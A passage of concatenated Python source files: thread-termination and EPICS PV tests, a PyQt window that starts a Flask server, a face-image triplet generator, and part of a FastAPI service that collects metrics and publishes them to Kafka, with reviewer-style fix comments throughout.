    """terminate_processor() sets both terminate events, joins the worker
    threads and clears the thread handles.

    Fix: mock parameters renamed to the bottom-up injection order of
    stacked ``mock.patch`` decorators (original order was reversed).
    """
    global_boolean = {}

    def _dequeue_side_effect():
        time.sleep(0.1)
        global_boolean['dequeue'] = True

    def _enqueue_side_effect():
        time.sleep(0.1)
        global_boolean['enqueue'] = True

    wfp = WFprocessor(sid='test_sid', workflow='workflow',
                      pending_queue='pending_queue',
                      completed_queue='completed_queue',
                      rmq_conn_params='test_rmq_params',
                      resubmit_failed=False)
    wfp._uid = 'wfp.0000'
    wfp._logger = mocked_Logger
    wfp._prof = mocked_Profiler
    wfp._enqueue_thread = mt.Thread(target=_enqueue_side_effect)
    wfp._dequeue_thread = mt.Thread(target=_dequeue_side_effect)
    wfp._enqueue_thread_terminate = mt.Event()
    wfp._dequeue_thread_terminate = mt.Event()
    wfp._enqueue_thread.start()
    wfp._dequeue_thread.start()
    wfp.terminate_processor()
    self.assertTrue(wfp._enqueue_thread_terminate.is_set())
    self.assertTrue(wfp._dequeue_thread_terminate.is_set())
    self.assertIsNone(wfp._dequeue_thread)
    self.assertIsNone(wfp._enqueue_thread)
    # Both thread bodies must have completed before terminate returned.
    self.assertTrue(global_boolean['dequeue'])
    self.assertTrue(global_boolean['enqueue'])
|
test_psp.py | import sys
import time
import threading
import logging
import pytest
import numpy as np
import psp
from conftest import test_pvs, pvbase
if sys.version_info.major >= 3:
long = int
logger = logging.getLogger(__name__)
def setup_pv(pvname, connect=True):
    """Return a psp.PV for *pvname*; when *connect* is true, wait up to 1 s."""
    channel = psp.PV(pvname)
    if connect:
        channel.connect(timeout=1.0)
    return channel
def test_server_start(server):
    # Smoke test: merely requesting the ``server`` fixture must succeed.
    pass
@pytest.mark.timeout(10)
@pytest.mark.parametrize('pvname', test_pvs)
def test_connect_and_disconnect(pvname):
    """A PV can be connected and then cleanly disconnected."""
    logger.debug('test_create_and_clear_channel %s', pvname)
    channel = setup_pv(pvname)
    assert channel.isconnected
    channel.disconnect()
@pytest.mark.timeout(10)
@pytest.mark.parametrize('pvname', test_pvs)
def test_get(pvname):
    """Reading a connected PV yields a non-None value."""
    logger.debug('test_get_data %s', pvname)
    channel = setup_pv(pvname)
    assert channel.get() is not None
@pytest.mark.timeout(10)
@pytest.mark.parametrize('pvname', test_pvs)
def test_put_get(pvname):
    """Writing a new value to a PV and reading it back round-trips."""
    logger.debug('test_put_get %s', pvname)
    pv = setup_pv(pvname)
    old_value = pv.get()
    pv_type = type(old_value)
    logger.debug('%s is of type %s', pvname, pv_type)
    if pv_type in (int, long, float):
        new_value = old_value + 1
    elif pv_type == str:
        new_value = "putget"
    elif pv_type == tuple:
        new_value = tuple([1] * len(old_value))
    else:
        # Fix: the original fell through with ``new_value`` unbound,
        # producing a confusing NameError for unexpected PV types.
        pytest.fail('unsupported PV value type: %s' % pv_type)
    logger.debug('caput %s %s', pvname, new_value)
    pv.put(new_value, timeout=1.0)
    assert pv.get() == new_value
@pytest.mark.timeout(10)
@pytest.mark.parametrize('pvname', test_pvs)
def test_monitor(pvname):
    """A monitored PV's cached ``.value`` tracks a put within ~1 s."""
    logger.debug('test_subscribe %s', pvname)
    pv = setup_pv(pvname)
    old_value = pv.get()
    pv_type = type(old_value)
    pv.monitor()
    logger.debug('%s is of type %s', pvname, pv_type)
    if pv_type in (int, long, float):
        new_value = old_value + 1
    elif pv_type == str:
        new_value = "putmon"
    elif pv_type == tuple:
        new_value = tuple([1] * len(old_value))
    else:
        # Fix: the original fell through with ``new_value`` unbound,
        # producing a confusing NameError for unexpected PV types.
        pytest.fail('unsupported PV value type: %s' % pv_type)
    logger.debug('caput %s %s', pvname, new_value)
    pv.put(new_value)
    # Poll for up to one second for the monitor callback to fire.
    n = 0
    while n < 10 and pv.value != new_value:
        time.sleep(0.1)
        n += 1
    assert pv.value == new_value
@pytest.mark.timeout(10)
@pytest.mark.parametrize('pvname', test_pvs)
def test_misc(pvname):
    """The metadata accessors return the documented primitive types."""
    logger.debug('test_misc %s', pvname)
    channel = setup_pv(pvname)
    checks = ((channel.host(), str),
              (channel.state(), int),
              (channel.count, int),
              (channel.type(), str),
              (channel.rwaccess(), int))
    for value, expected_type in checks:
        assert isinstance(value, expected_type)
@pytest.mark.timeout(10)
def test_waveform():
    """A waveform PV can be read both as a tuple and as a numpy array."""
    logger.debug('test_waveform')
    pv = setup_pv(pvbase + ":WAVE")
    # Tuple mode first ...
    pv.use_numpy = False
    as_tuple = pv.get()
    assert isinstance(as_tuple, tuple)
    assert len(as_tuple) == pv.count
    # ... then numpy mode.
    pv.use_numpy = True
    as_array = pv.get()
    assert isinstance(as_array, np.ndarray)
    assert len(as_array) == pv.count
@pytest.mark.timeout(10)
def test_threads():
    """PV access works from a worker thread once a CA context is ensured.

    NOTE: as in the original, an assertion failing inside the worker
    thread is not propagated to pytest.
    """
    logger.debug('test_threads')

    def worker(name):
        psp.utils.ensure_context()
        channel = setup_pv(name)
        assert isinstance(channel.get(), tuple)

    t = threading.Thread(target=worker, args=(pvbase + ":WAVE",))
    t.start()
    t.join()
|
main_window.py | # -*- coding: utf-8 -*-
from PyQt5.QtWidgets import QMainWindow
from PyQt5 import QtWidgets, QtCore
from qt_figure import QtFigure
from http_server import flask
import socket
import multiprocessing
import threading
import re
class MyPushButton(QtWidgets.QPushButton):
    # Toggle flag set per button instance: flipped on every click by
    # MyMainWindow._on_btn_click to track start/stop state.
    is_clicked = False
class MyMainWindow(QMainWindow):
    """Main application window.

    Hosts a matplotlib figure, ip/port inputs and a start/stop button that
    launches the embedded Flask HTTP server in a child process.  Messages
    produced by the server are pulled from ``msg_queue`` by a reader thread
    and forwarded to the status bar via ``ui_signal`` (so UI updates happen
    on the GUI thread).
    """

    # Emitted with a text message; connected to _show_message.
    ui_signal = QtCore.pyqtSignal(str)

    def __init__(self):
        super().__init__()
        self.title = "Log Analyzer"
        self.top = 0
        self.left = 0
        # NOTE: these shadow QWidget.width()/height(); only used as the
        # initial/minimum geometry below.
        self.width = 600
        self.height = 400
        self.push_btn = None
        self.ip_line_edit = None
        self.port_label_edit = None
        self.status_bar = None
        # Bounded queue shared with the Flask server child process.
        self.msg_queue = multiprocessing.Queue(10)
        self.process = None                 # server process while running
        self.read_queue_is_runing = False   # (sic) reader-thread run flag

    def init_window(self):
        """Build the widget tree and wire signals; call once after __init__."""
        self.setWindowTitle(self.title)
        self.setGeometry(self.left, self.top, self.width, self.height)
        self.setMinimumSize(self.width, self.height)
        centralist = QtWidgets.QWidget()
        self.setCentralWidget(centralist)
        grid_layout = QtWidgets.QGridLayout(centralist)  # layout of the central widget
        figure = QtFigure(width=3, height=2, dpi=100)
        figure.plot()
        grid_layout.addWidget(figure)
        horizontally_widget = QtWidgets.QWidget(centralist)
        horizontally_widget.setGeometry(QtCore.QRect(90, 10, 431, 41))
        horizontal_layout = QtWidgets.QHBoxLayout(horizontally_widget)
        horizontal_layout.setContentsMargins(0, 0, 0, 0)
        ip_label = QtWidgets.QLabel(horizontally_widget)
        ip_label.setText("ip")
        horizontal_layout.addWidget(ip_label)
        self.ip_line_edit = QtWidgets.QLineEdit()
        self.ip_line_edit.setPlaceholderText("ip")
        horizontal_layout.addWidget(self.ip_line_edit, stretch=7)
        port_label = QtWidgets.QLabel(horizontally_widget)
        port_label.setText("port")
        horizontal_layout.addWidget(port_label)
        self.port_label_edit = QtWidgets.QLineEdit(horizontally_widget)
        self.port_label_edit.setEnabled(True)
        horizontal_layout.addWidget(self.port_label_edit, stretch=2)
        spacer_item = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        horizontal_layout.addItem(spacer_item)
        self.push_btn = MyPushButton(horizontally_widget)
        self.push_btn.clicked.connect(lambda: self._on_btn_click(self.push_btn))
        horizontal_layout.addWidget(self.push_btn)
        menu_bar = QtWidgets.QMenuBar(self)
        self.setMenuBar(menu_bar)
        self.status_bar = QtWidgets.QStatusBar(self)
        self.setStatusBar(self.status_bar)
        self.ui_signal.connect(self._show_message)
        self._default_config()

    def _default_config(self):
        """Pre-fill the controls with the detected local IP and default port."""
        self.push_btn.setText("startServer")
        addr = MyMainWindow.get_host_ip()
        self.ip_line_edit.setText(addr)
        self.port_label_edit.setText("5000")

    def _on_btn_click(self, sender):
        """Toggle the HTTP server: stop it if running, otherwise start it."""
        if sender.is_clicked:
            self.process.terminate()
            self.read_queue_is_runing = False
            # Sentinel message unblocks the reader thread's blocking get().
            self.msg_queue.put("quit queue.")
            sender.setText("startServer")
        else:
            ip = self.ip_line_edit.text()
            if not self.check_ip(ip):
                self.ui_signal.emit("ip is not match.")
                return
            port = self.port_label_edit.text()
            if not port.isnumeric():
                return
            self.read_queue_is_runing = True
            thread = threading.Thread(target=self._read_queue)
            thread.start()
            self.process = multiprocessing.Process(target=self._worker, args=(self.msg_queue, ip, port))
            self.process.start()
            sender.setText("closeServer")
        sender.is_clicked = not sender.is_clicked

    def _show_message(self, msg):
        """Slot: display *msg* in the status bar (runs on the GUI thread)."""
        self.status_bar.showMessage(msg)

    def _read_queue(self):
        """Reader-thread loop: forward queued server messages to the UI."""
        while self.read_queue_is_runing:
            data = self.msg_queue.get(block=True)
            print(data)
            self.ui_signal.emit(data)

    def _worker(self, q, host, port):
        """Child-process entry point: run the Flask app bound to host:port."""
        flask.msg_queue = q
        # ssl_context = ("cert/cert.pem", "cert/key.pem")
        flask.run(host=host, port=int(port), debug=False, threaded=True)

    @staticmethod
    def check_ip(ip):
        """Return True when *ip* looks like a dotted-quad IPv4 address."""
        compile_ip = re.compile(
            "^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)$")
        if compile_ip.match(ip):
            return True
        else:
            return False

    @staticmethod
    def get_host_ip():
        """Best-effort detection of the host's outbound IP address.

        A UDP "connect" sends no packets; it only selects a route, so
        getsockname() yields the local address used to reach 8.8.8.8.
        Falls back to 127.0.0.1 when no socket/route is available.

        Fix: the original left ``ip`` unbound and called ``s.close()`` on
        None when socket creation or connect failed, crashing instead of
        falling back.
        """
        ip = None
        s = None
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.connect(('8.8.8.8', 80))
            ip = s.getsockname()[0]
        except OSError:
            pass
        finally:
            if s is not None:
                s.close()
        if ip is None:
            ip = "127.0.0.1"
        return ip
|
generate.py | """Collection of functions to generate data"""
import multiprocessing
import os
from glob import glob
import numpy as np
from torchvision.utils import save_image
from tqdm import tqdm
from src.data.raw import Raw
from src.features import transform
from src.utils import path
def _triplets(dataset: Raw, n_triplets: int, process_id: int):
    """Worker: generate up to ``n_triplets`` (anchor, positive, negative) triplets.

    Aligned copies of the involved images are saved under the "processed"
    data category and the triplet list is written to an interim ``.npy``
    file named after ``process_id`` (merged later by :func:`triplets`).
    Returns the list of generated triplet records.
    """
    # Seed from the OS so each worker process draws a different stream.
    random_state = np.random.RandomState(seed=None)
    classes = list(set([annotation["class_id"] for image, annotation in dataset]))
    triplet_list = []
    progress_bar = tqdm(range(int(n_triplets)))
    for _ in progress_bar:
        pos_class = neg_class = None
        pos_images = None
        positive = negative = None
        # The positive class must provide at least two distinct images
        # (one anchor plus one positive).
        while pos_class is None or len(pos_images) < 2 or isinstance(pos_images, str):
            pos_class = random_state.choice(classes)
            pos_images = dataset.get_images(class_id=pos_class)
        while neg_class is None or neg_class == pos_class:
            neg_class = random_state.choice(classes)
        anchor = random_state.choice(pos_images)
        while positive is None or anchor == positive:
            positive = random_state.choice(pos_images)
        # NOTE(review): ``neg_class`` is never used to draw the negative --
        # the negative is any random image outside the positive class;
        # confirm whether it should instead be sampled from ``neg_class``.
        while negative is None or negative in pos_images:
            negative = dataset.get_images(n_random=1)
        aligned_images = transform.align_images(anchor, positive, negative)
        if len(aligned_images) == 3:
            image_paths = [
                path.change_data_category(image_path, "processed")
                for image_path in [anchor, positive, negative]
            ]
            triplet_list.append([*image_paths, pos_class, pos_class, neg_class])
            for aligned_image, image_path in zip(aligned_images, image_paths):
                # NOTE: images are saved aligned but also post-processed, therefore we
                # don't need to transform them on load using the method
                # facenet_pytorch.fixed_image_standardization.
                abs_image_path = os.path.join(path.get_project_root(), image_path)
                os.makedirs(os.path.dirname(abs_image_path), exist_ok=True)
                normalized_image = aligned_image / 255.0
                # Fix: save to the absolute path whose directory was just
                # created -- the original wrote to the *relative* path,
                # which fails whenever CWD is not the project root.
                save_image(normalized_image, abs_image_path)
    # Recompute: some triplets may have been discarded (i.e. not able to
    # align, or other reason).
    n_triplets = len(triplet_list)
    temp_path = path.change_data_category(dataset.get_path(), "interim")
    os.makedirs(temp_path, exist_ok=True)
    np.save(
        os.path.join(temp_path, f"triplets_{n_triplets}_{process_id}.npy"), triplet_list
    )
    return triplet_list
def triplets(dataset: Raw, n_triplets: int, n_processes: int):
    """Generate a set of triplets. It saves an aligned copy of each image in a triplet in
    `data/processed` and a file `.npy` containing the list of triplets.

    :param dataset: dataset to use to generate triplets
    :param n_triplets: number of triplets to generate
    :param n_processes: number of processes to use
    """
    # NOTE: code is inspired by https://github.com/tamerthamoqa/facenet-pytorch-vggface2
    triplet_list = []
    print(f"Generating {n_triplets} triplets using {n_processes} processes...")
    triplet_residual = n_triplets % n_processes
    # Fix: use integer division -- the original produced a float count.
    n_triplets_per_process = (n_triplets - triplet_residual) // n_processes
    processes = []
    for i in range(n_processes):
        processes.append(
            multiprocessing.Process(
                target=_triplets, args=(dataset, n_triplets_per_process, i)
            )
        )
    for process in processes:
        process.start()
    for process in processes:
        process.join()
    # Generate residual triplets in this process (extra id avoids clashing
    # with the worker files).
    _triplets(dataset, triplet_residual, n_processes + 1)
    # Merge all per-process interim files into a single triplet list.
    temp_path = path.change_data_category(dataset.get_path(), "interim")
    numpy_files = glob(os.path.join(temp_path, "*.npy"))
    for numpy_file in numpy_files:
        triplet_list.extend(np.load(numpy_file))
        os.remove(numpy_file)
    # Update the total value of triplets, since some could have been discarded (i.e. not able to
    # align, or other reason)
    n_triplets = len(triplet_list)
    save_path = os.path.join(path.get_project_root(), "data", "processed", "triplets")
    os.makedirs(save_path, exist_ok=True)
    n_files = str(len(glob(os.path.join(save_path, "*.*")))).zfill(2)
    basename = f"{n_files}_{dataset.get_name()}_{n_triplets}.npy"
    filename = os.path.join(save_path, basename)
    # Fix: the original printed the literal "(unknown)" instead of the path.
    print(f"Saved triplets to {filename}")
    np.save(filename, triplet_list)
|
main.py | from fastapi import FastAPI, Response
from starlette.status import HTTP_204_NO_CONTENT
import uuid, random, requests, json, hashlib, os, rsa, sys, datetime, trace, time, logging
from threading import Thread
from queue import PriorityQueue
from Crypto.PublicKey import RSA
from pydantic import BaseModel
from typing import Optional, List
from kafka import KafkaProducer
from fastapi.responses import JSONResponse
from sqlalchemy import *
from sqlalchemy import create_engine
from sqlalchemy_utils import database_exists, create_database
from sqlalchemy.orm import scoped_session, sessionmaker, relationship
from sqlalchemy.ext.declarative import declarative_base
import sqlalchemy.dialects.postgresql as postgresql
import psycopg2
import psycopg2.extras
from dateutil.relativedelta import relativedelta
from timeloop import Timeloop
from datetime import timedelta
logging.basicConfig(filename='logs/'+'mda.json', level=logging.INFO, format='{ "timestamp": "%(asctime)s.%(msecs)03dZ", %(message)s}', datefmt='%Y-%m-%dT%H:%M:%S')
logging.getLogger("uvicorn.error").setLevel(logging.CRITICAL)
logging.getLogger("kafka").setLevel(logging.CRITICAL)
# Environment variables (all mandatory; startup aborts when any is missing)
try:
    POSTGRES_USER = os.environ["POSTGRES_USER"]
    POSTGRES_PW = os.environ["POSTGRES_PW"]
    POSTGRES_URL = os.environ["POSTGRES_URL"]
    POSTGRES_DB = os.environ["POSTGRES_DB"]
    RESET_DB = os.environ["RESET_DB"]
    KAFKA_HOST = os.environ["KAFKA_HOST"]
    KAFKA_PORT = os.environ["KAFKA_PORT"]
    #publicKeyOperator = os.environ["OPERATOR_PUBLIC_KEY"]
except KeyError as e:
    # os.environ[...] only raises KeyError; report which variable is missing.
    print("Environment variable does not exists.", e)
    # Fix: exit with a non-zero status -- the original exited 0, signalling
    # success to the supervisor despite a fatal misconfiguration.
    sys.exit(1)
class Metric_Model(BaseModel):
    # Request body describing one metric to collect.
    metricName: str
    metricType: str
    # Polling interval (e.g. "15min" in the sample payload below).
    step: str
    # Optional aggregation: method (see agg_options) and window (e.g. "1h").
    aggregationMethod: Optional[str] = None
    step_aggregation: Optional[str] = None
class Response_Metric_Model(BaseModel):
    # Metric_Model plus the scheduler-managed timestamps returned to clients.
    metricName: str
    metricType: str
    step: str
    aggregationMethod: Optional[str] = None
    step_aggregation: Optional[str] = None
    # When the metric will next be fetched / next aggregated.
    next_run_at: datetime.datetime
    next_aggregation: Optional[datetime.datetime] = None
class Config_Model(BaseModel):
    # Request body for creating a monitoring configuration.
    businessID: str
    topic: str        # DL Kafka topic the collected data is published to
    networkID: int
    tenantID: str
    resourceID: str
    referenceID: str
    metrics: List[Metric_Model]
    # Optional collection window; open-ended when omitted.
    timestampStart: Optional[datetime.datetime] = None
    timestampEnd: Optional[datetime.datetime] = None
class Update_Config_Model(BaseModel):
    # Partial update: only the end timestamp and/or the metric list may change.
    timestampEnd: Optional[datetime.datetime] = None
    metrics: Optional[List[Metric_Model]] = None
class Response_Config_Model(BaseModel):
    # Full configuration record as returned by the API.
    id: uuid.UUID
    created_at: datetime.datetime
    updated_at: datetime.datetime
    businessID: str
    topic: str
    networkID: int
    timestampStart: datetime.datetime
    timestampEnd: Optional[datetime.datetime] = None
    metrics: List[Response_Metric_Model]
    # 1 = enabled, 0 = disabled (see the canned examples below).
    status: int
    tenantID: str
    resourceID: str
    referenceID: str
class Response_Error_Model(BaseModel):
    # Generic error payload: status code plus a human-readable message.
    status: str
    message: str
# Json response example (canned payloads mirroring Response_Config_Model).
# Fix: the original dict literal listed "businessID" twice (36574564 and
# then "business1"); in a dict literal the later occurrence silently wins,
# so only the surviving value is kept here.
json_response_enable = {"id": "ab51f3e1-7b61-4f9d-85a4-9e9f366b593b","created_at": "2021-03-11T11:34:00.402075","updated_at": "null","businessID": "business1", "topic": "test1", "networkID": 1, "tenantID": "tenant1", "referenceID": "reference1", "resourceID": "resource1","timestampStart": "2021-03-11T11:35:00","timestampEnd": "null","metrics": [{"metricName": "cpu_utilization","metricType": "float","aggregationMethod": "sum","step": "15min","step_aggregation": "1h", "next_run_at": "2021-03-11T11:45:00", "next_aggregation": "2021-03-11T12:35:00"}],"status": 1}
json_response_disable = json_response_enable.copy()
json_response_disable['status'] = 0
# Accepted aggregation functions and schedule-step unit suffixes.
agg_options = ['SUM', 'AVG', 'MIN', 'MAX', 'COUNT', 'STDDEV']
step_options = ['s', 'm', 'h', 'd', 'w']
# Scheduling queues: metrics waiting for their next run vs. ready to fetch.
wait_queue = PriorityQueue()
metrics_queue = PriorityQueue()
num_fetch_threads = 20
first_metric_aux = None     # timestamp of the earliest scheduled metric
update_queue_flag = False   # set by workers after rescheduling a metric
from .database import *
def info_log(status, message):
    # Emit a JSON-fragment log entry ("status"/"message" keys, completed by
    # the format string in logging.basicConfig above).
    # NOTE(review): logged at CRITICAL even for informational messages --
    # presumably so entries always pass the level filters configured for the
    # uvicorn/kafka loggers; confirm intent (the function name says "info").
    logging.critical('"status": "'+str(status)+'", "message": "'+message+'"')
# Update first metric to read
def update_first_metric_aux():
    """Peek at the earliest scheduled metric in ``wait_queue``.

    Returns the priority (first tuple element) of the head item, or None
    when the queue is empty.  Implemented as get-then-put because
    PriorityQueue offers no peek operation.
    """
    if wait_queue.empty():
        return None
    head = wait_queue.get()
    wait_queue.put(head)
    return head[0]
def send_kafka(data, dataHash, kafka_topic):
    """Hash and "sign" *dataHash*, then publish *data* to *kafka_topic*.

    Returns 1 on success, 0 on any failure (errors are logged, not raised).
    """
    try:
        # SHA-256 each value of dataHash (values are stringified first).
        payload_encoded = {k: str(v).encode('utf-8') for k, v in dataHash.items()}
        hashData = {k: hashlib.sha256(v).hexdigest() for k,v in payload_encoded.items()}
        #info_log(None, f'Raw Data: {data} \nHashed Data: {hashData}')
        # NOTE(review): a fresh RSA key pair is generated for every message,
        # and the *private* key is passed to rsa.encrypt(), whose API expects
        # a public key.  The key pair is never persisted or shared, so the
        # resulting "signature" cannot be verified downstream -- confirm the
        # intended signing scheme before relying on this.
        public_key, private_key = rsa.newkeys(1024)
        dataHashEncrypt = {rsa.encrypt(k.encode(), private_key): rsa.encrypt(v.encode(), private_key) for k,v in hashData.items()}
        #info_log(None, f'Signup Data: {dataHashEncrypt}')
        # A new producer per message; the encrypted hash rides as message key.
        producer = KafkaProducer(bootstrap_servers=[KAFKA_HOST+':'+KAFKA_PORT], value_serializer=lambda x: json.dumps(x).encode('utf-8'), api_version=(0,10,1))
        producer.send(kafka_topic, key=list(dataHashEncrypt.values())[0], value=data)
        info_log(200, f'Post metric {data["monitoringData"]["metricName"]}, from operator {data["operatorID"]}, into DL Kafka Topic {kafka_topic} [Post Time: {data["monitoringData"]["timestamp"]}]')
        return 1
    except Exception as e:
        info_log(400, 'Erro in request_orchestrator: ' + str(e))
        return 0
def send_aggregation(metric_name, resourceID, referenceID, next_run_at, tenantID, businessID, networkID, kafka_topic, aggregation, metric_id, next_aggregation, step_aggregation):
    """Aggregate the stored samples of a metric and publish the result.

    Looks up the aggregated value via get_last_aggregation(), wraps it in
    the monitoring-data envelope and ships it through send_kafka().
    Returns 1 on success, 0 on failure (errors are logged, not raised).
    """
    try:
        value = get_last_aggregation(metric_id, aggregation, next_aggregation, step_aggregation)
        # Payload that ends up on the DL Kafka topic.
        monitoring_data = {
            "metricName": metric_name,
            "metricValue": value,
            "resourceID": resourceID,
            "referenceID": referenceID,
            "timestamp": str(next_run_at),
            "aggregationMethod": aggregation,
        }
        envelope = {
            "operatorID": tenantID,
            "businessID": businessID,
            "networkID": networkID,
            "monitoringData": monitoring_data,
        }
        send_kafka(envelope, {"data": monitoring_data}, kafka_topic)
        print('SEND AGGREGATION-> '+str(next_run_at)+' -> '+ str(value))
        return 1
    except Exception as e:
        print('send_aggregation-> ' + str(e))
        info_log(400, 'Erro in request_orchestrator: ' + str(e))
        return 0
def request_orchestrator(metric_name, resourceID, referenceID, next_run_at, tenantID, businessID, networkID, kafka_topic, aggregation, metric_id):
    """Fetch one metric sample from the OSM orchestrator.

    When *aggregation* is set the sample is stored for later aggregation;
    otherwise it is published to the DL Kafka topic immediately.
    Returns 1 on success, 0 on failure.

    Fix: the non-200 branch used to return the tuple
    ``('Error in fetching data!', 200)`` -- inconsistent with the 0/1
    convention used everywhere else; it now returns 0 like the except path.
    """
    try:
        request_metric = "match="+metric_name+"&"
        request_schedule = "start="+str(next_run_at)
        # curl TBD to 'http://localhost:9090/api/v1/query=cpu_utilization&time=2015-07-01T20:10:51'
        endpoint = 'http://osm:4500/monitoringData?'
        request_url = endpoint + request_metric + request_schedule
        response = requests.get(request_url)
        if response.status_code != 200:
            info_log(400, "Request to OSM not sucessful")
            return 0
        resp = response.text
        json_data = json.loads(resp)
        info_log(None, f'Response from OSM: {resp}')
        if aggregation is not None:
            # Store the raw sample; the aggregation job publishes later.
            insert_metric_value(metric_id, json_data["data"]["result"][0]["values"][0][1], next_run_at)
        else:
            # Create JSON object that will be sent to DL Kafka Topic
            monitoringData = {
                "metricName" : json_data["data"]["result"][0]["metric"]["__name__"],
                "metricValue" : json_data["data"]["result"][0]["values"][0][1],
                "resourceID" : resourceID,
                "referenceID" : referenceID,
                "timestamp" : str(next_run_at)
            }
            dataHash = {
                "data" : monitoringData
            }
            data = {
                "operatorID" : tenantID,
                "businessID" : businessID,
                "networkID" : networkID
            }
            data["monitoringData"] = monitoringData
            send_kafka(data, dataHash, kafka_topic)
            print('SEND DATA-> '+str(next_run_at)+' -> '+ str(json_data["data"]["result"][0]["values"][0][1]))
        return 1
    except Exception as e:
        print('request_orchestrator-> ' + str(e))
        info_log(400, 'Erro in request_orchestrator: ' + str(e))
        return 0
# Worker thread function
def queue_consumer(i, q):
    """Daemon worker *i*: pop due metrics from *q* and dispatch them.

    Queue items are tuples; the indices used below map onto the dispatch
    call arguments as follows (derived from the calls themselves):
    [0]=next_run_at, [2]=step, [4]=metric id, [5]=metric name,
    [7]=aggregation method, [8]=businessID, [9]=kafka topic, [10]=networkID,
    [11]=tenantID, [12]=resourceID, [13]=referenceID, [14]=step_aggregation,
    [15]=next_aggregation, [16]=aggregation flag (1 -> aggregate).
    """
    global update_queue_flag
    try:
        while True:
            # Blocks until a metric is due.
            next_item = q.get()
            info_log(None, f'Start Fetching Values of Metric: {next_item[5]} (Thread Associated: {i})')
            if next_item[16] == 1:
                #Send aggregation
                info_log(None, f'{datetime.datetime.now()} - UC1: Aggregating values from metric: {next_item[5]} (Step Aggregation Associated: {next_item[14]})')
                send_aggregation(next_item[5], next_item[12], next_item[13], next_item[0], next_item[11], next_item[8], next_item[10], next_item[9], next_item[7], next_item[4], next_item[15], next_item[14])
            else:
                #Send metric
                request_orchestrator(next_item[5], next_item[12], next_item[13], next_item[0], next_item[11], next_item[8], next_item[10], next_item[9], next_item[7], next_item[4])
                info_log(None, f'{datetime.datetime.now()} - UC2: Fetching values from OSM, metric: {next_item[5]} (Step Associated: {next_item[2]}')
            # Reschedule the metric and tell the timeloop to re-peek the queue.
            update_next_run(next_item[4])
            update_queue_flag = True
            q.task_done()
    except Exception as e:
        print(e)
def validate_uuid4(uuid_string):
    """Return True if *uuid_string* parses as a UUID, False otherwise.

    uuid.UUID raises ValueError for malformed strings, but TypeError or
    AttributeError for non-string input (e.g. None), which the original
    code did not catch; all of these now simply yield False.
    """
    try:
        uuid.UUID(uuid_string)
    except (ValueError, AttributeError, TypeError):
        return False
    return True
# --------------------- START SCRIPT -----------------------------#
# ----------------------------------------------------------------#
# Load database metrics to wait queue
load_database_metrics()
# Update first metric to read (earliest next_run_at, or None when empty)
first_metric_aux = update_first_metric_aux()
# Set up the pool of worker threads that fetch the metrics
for i in range(num_fetch_threads):
    worker = Thread(target=queue_consumer, args=(i, metrics_queue,))
    worker.setDaemon(True)  # daemon so the process can exit without joining
    worker.start()
# Periodic job that promotes due metrics from wait_queue to metrics_queue
tl = Timeloop()
logging.getLogger("timeloop").setLevel(logging.CRITICAL)
@tl.job(interval=timedelta(seconds=1))
def check_waiting_metrics():
    """Runs every second: move metrics whose next_run_at has passed."""
    global metrics_queue
    global wait_queue
    global update_queue_flag
    global first_metric_aux
    '''print('RUN TIMELOOP')
    print('metrics_queue')
    print(metrics_queue.queue)
    print('wait_queue')
    print(wait_queue.queue)
    print('update_queue_flag')
    print(update_queue_flag)
    print('first_metric_aux')
    print(first_metric_aux)
    print('now')
    print(str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")))'''
    # A worker signalled that schedules changed; recompute the next due time.
    if update_queue_flag:
        first_metric_aux = update_first_metric_aux()
        update_queue_flag = False
    # NOTE(review): timestamps are compared as strings; this only works while
    # the format stays "%Y-%m-%d %H:%M:%S" (lexicographic == chronological).
    if first_metric_aux != None and str(first_metric_aux) <= str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")):
        metrics_queue.put(wait_queue.get())
        first_metric_aux = update_first_metric_aux()
    return
tl.start(block=False)
# ----------------------- MAIN APP -------------------------------#
# ----------------------------------------------------------------#
app = FastAPI()
@app.on_event("shutdown")
def shutdown_event():
    """Drain both work queues and close the DB connection on shutdown."""
    global metrics_queue
    global wait_queue
    print('exit')
    # Block until all queued metric jobs have been acknowledged.
    for pending_queue in (wait_queue, metrics_queue):
        pending_queue.join()
    # Close connection db
    close_connection()
    return
# ----------------- REST FASTAPI METHODS -------------------------#
# ----------------------------------------------------------------#
@app.post("/settings", status_code=201, responses={201: {"model": Response_Config_Model,
                                                         "content": {"application/json": {
                                                             "example": json_response_enable}}},
                                                   404: {"model": Response_Error_Model,
                                                         "content": {"application/json": {
                                                             "example": {"status": "Error", "message": "Error message."}}}}})
async def set_param(config: Config_Model):
    """Create a new monitoring configuration and schedule its metrics."""
    global update_queue_flag
    # Validate each metric's aggregation method and step suffix.
    for metric in config.metrics:
        if metric.aggregationMethod != None and metric.aggregationMethod.upper() not in agg_options:
            return JSONResponse(status_code=404, content={"status": "Error", "message": "Aggregation step options is "+str(agg_options)+"."})
        # NOTE(review): this condition joins the step_aggregation and step
        # suffix checks with 'and', so it only rejects when BOTH suffixes
        # are invalid — 'or' may have been intended. TODO confirm.
        if metric.step_aggregation != None and metric.step_aggregation[-1] not in step_options and metric.step[-1] not in step_options:
            return JSONResponse(status_code=404, content={"status": "Error", "message": "Step and step aggregation options is "+str(step_options)+"."})
    # Default the start timestamp to "now"; reject starts in the past
    # (with one minute of tolerance).
    if config.timestampStart == None:
        config.timestampStart = datetime.datetime.now()
    elif config.timestampStart < datetime.datetime.now() - relativedelta(minutes=1):
        return JSONResponse(status_code=404, content={"status": "Error", "message": "Timestamp start need to be after current now."})
    if config.timestampEnd != None and config.timestampStart > config.timestampEnd:
        return JSONResponse(status_code=404, content={"status": "Error", "message": "Timestamp start need to be after timestamp end."})
    # Save config in database
    resp = add_config(config)
    if resp == -1:
        return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in create config in database."})
    update_queue_flag = True
    info_log(200, f'Monitoring spec successfully created by operator {config.tenantID}')
    return resp
@app.get("/settings/{config_id}", responses={200: {"model": Response_Config_Model,
                                                   "content": {"application/json": {
                                                       "example": json_response_enable}}},
                                             404: {"model": Response_Error_Model,
                                                   "content": {"application/json": {
